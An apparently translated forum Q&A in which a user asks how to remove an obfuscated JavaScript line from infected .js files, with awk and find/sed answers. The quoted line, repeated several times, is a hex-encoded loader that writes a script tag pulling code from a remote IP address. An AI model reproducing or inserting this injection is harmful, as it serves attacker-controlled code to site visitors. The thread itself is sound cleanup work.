Replacing a complex pattern with sed

Time: 2017-02-01 13:37:50

Tags: regex perl awk sed

I want to replace a pattern using the sed command. The pattern to remove is shown below, spaces included.

var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]]\(_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]]\(_0xaae8[0]))

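Now I need to replace the pattern above with a space. The pattern can appear anywhere in a file (that is, it can start at the beginning of the file, at the end of the file, or between other strings).

Any hints on how to remove it with a sed regular expression?

Thanks.

2 answers:

Answer 0: (score: 2)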

$ cat r.awk
#!/usr/bin/awk -f

NR == FNR { # first file: holds the literal string to match
    str = $0
    rep = " " # replacement text
    RS = "$^" # a regex that never matches, so the next record is
              # the whole second file (multi-character RS is an
              # extension, e.g. in gawk)
    nextfile
}

{
    file = $0; ans = ""
    while (i = index(file, str)) {
        pre  = substr(file, 1              , i - 1)  # parts before
        post = substr(file, i + length(str))         # and after `str'
        ans  = ans pre rep # append to the output
        file = post
    }
    ans = ans file
    printf "%s", ans
}

Store the string in a file:

$ cat r.txt
var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]]\(_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]]\(_0xaae8[0]))

An example:

$ cat f.txt
BEFORE
var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]]\(_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]]\(_0xaae8[0]))
AFTER
var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]]\(_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]]\(_0xaae8[0]))
END

Usage:

$ awk -f r.awk r.txt f.txt

BEFORE

AFTER

END
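Because the string sits on a single line, a line-by-line variant is also possible. The sketch below is not the script from this answer: `replace_literal` is a hypothetical helper name, and it assumes the first file holds the string on exactly one line. It avoids `nextfile` and the regex `RS`, so it should run in a plain POSIX awk. As in the script above, the string is read from a file rather than passed with `-v`, because awk would process backslash escapes such as `\x6A` in a `-v` assignment.

```shell
# Hypothetical helper: $1 = file holding the literal string (one line),
#                      $2 = file to filter; result goes to stdout.
replace_literal() {
    awk '
        NR == FNR { str = $0; next }   # first file: remember the literal
        {
            out = ""
            # index() does a plain substring search, so no regex escaping
            while (length(str) > 0 && (i = index($0, str)) > 0) {
                out = out substr($0, 1, i - 1) " "   # text before + space
                $0  = substr($0, i + length(str))    # continue after match
            }
            print out $0
        }
    ' "$1" "$2"
}
```

With the files from the example it would be called as `replace_literal r.txt f.txt > f.clean.txt`, where the output file name is only an illustration.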

Answer 1: (score: 1)

Another way to just remove the pattern, in a single line, using the find and sed commands:

$ find /path/to/files/ -type f \( -name "*.js" -o -name "*.json" \) -exec sh -c 'sed -i "s/var\s_0xaae8.*_0xaae8\[0\]))//" "$0"' {} \;

The command above searches under the given path and removes the pattern from every file with a .js or .json extension in which it is found.
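Since `sed -i` rewrites files in place, it can help to see which files would be touched first. The following is a minimal dry-run sketch, assuming the marker `var _0xaae8` is enough to identify affected files; `list_infected` is a hypothetical helper name, and `[[:space:]]` is used in place of `\s` only because `\s` is a GNU extension.

```shell
# Hypothetical helper: print the .js/.json files under directory $1
# that contain the marker, without modifying anything.
list_infected() {
    find "$1" -type f \( -name '*.js' -o -name '*.json' \) \
        -exec grep -l 'var[[:space:]]_0xaae8' {} +
}
```

Running `list_infected /path/to/files/` prints one matching file per line; if the list looks right, the sed command can then be applied to the same path.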

For JS files only:

$ find /path/to/files/ -type f -name "*.js" -exec sed -i "s/var\s_0xaae8.*_0xaae8\[0\]))//" '{}' \;

If you want to search files with any extension, feel free to drop the -name "*.x" part.
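The regex in the commands above relies on `.*`, which is greedy: if a line contained `_0xaae8[0]))` a second time further along, everything in between would be removed as well. A stricter alternative is to escape the whole literal string and hand that to sed. This is only a sketch under assumptions: `escape_sed_bre` is a hypothetical helper, the short sample string stands in for the real payload, and the string must fit on one line.

```shell
# Hypothetical helper: escape the characters that are special in a sed
# basic regular expression (and the / delimiter) so $1 matches literally.
escape_sed_bre() {
    printf '%s\n' "$1" | sed 's|[[\.*^$/]|\\&|g'
}

# Short stand-in for the real string, with brackets, a backslash and a dot.
literal='x[0]\(y.z)'
pattern=$(escape_sed_bre "$literal")

# Replace every literal occurrence with a single space.
printf '%s\n' 'BEFORE x[0]\(y.z) AFTER' | sed "s/$pattern/ /g"
```

For the real case the literal could be read from the file used in the first answer, for example `pattern=$(escape_sed_bre "$(cat r.txt)")`, and the resulting `s/$pattern/ /g` expression passed to the find command in place of the hand-written regex.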